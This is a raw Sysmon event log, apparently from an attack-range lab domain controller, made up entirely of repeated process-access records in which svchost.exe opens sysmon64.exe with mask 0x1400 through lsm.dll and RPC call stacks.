13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
